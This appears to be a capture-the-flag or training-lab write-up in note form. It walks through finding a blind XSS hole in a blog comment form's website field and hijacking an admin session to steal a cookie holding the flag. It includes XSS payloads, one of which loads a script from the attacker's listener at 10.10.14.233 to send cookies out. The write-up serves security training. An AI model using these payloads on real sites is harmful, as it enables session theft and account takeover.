# Brief 1. Identify a user-input field that is vulnerable to XSS 2. Find a working XSS payload that executes JavaScript code on the target's browser 3. Using the `Session Hijacking` techniques, try to steal the victim's cookies, which should contain the flag # XSS Detection - Ping test![[images/Pasted image 20251215194848.png]] - Nmap scan ![[images/Pasted image 20251215194854.png]] - Visit `/assesssment` page ![[images/Pasted image 20251215195008.png]] - Visit security blog page ![[images/Pasted image 20251215195043.png]] ## search field @ `/assessment` - try `<script>alert(window.origin)</script>` payload in search box - we get some interesting feedback ![[images/Pasted image 20251215195318.png]] - Run `xsstrike` - No quick results - Not going anywhere fast; we can come back to this ## security blog comment form @ `/assessment/index.php` - Create a test comment to see how the page behaves ![[images/Pasted image 20251216183130.png]] - Nothing happens but the below text indicates blind XSS due to admin review of comments ![[images/Pasted image 20251216183238.png]] - Start php listener on Kali ![[images/Pasted image 20251215200421.png]] - Load up comment form with blind XSS test remote scripts - Use differentiating extensions for each field so we know which one hits (if any) ![[images/Pasted image 20251215200413.png]] - GET request on website field! ![[images/Pasted image 20251215200436.png]] - Also getting hits using `"><script src` payload or vanilla `<script src` payload in website field # # Session Hijacking - Setup `script.js` ![[images/Pasted image 20251215201226.png]] - Setup `index.php` ![[images/Pasted image 20251215200952.png]] - Start listener in `/tmp/tmpserver` directory ![[images/Pasted image 20251215201125.png]] - Prepare XSS payload ```html '><script src="http://10.10.14.233:8080/script.js"></script> ``` - Inject XSS payload to steal cookie ![[images/Pasted image 20251215201515.png]] - GOT'EMM ![[images/Pasted image 20251215201607.png]]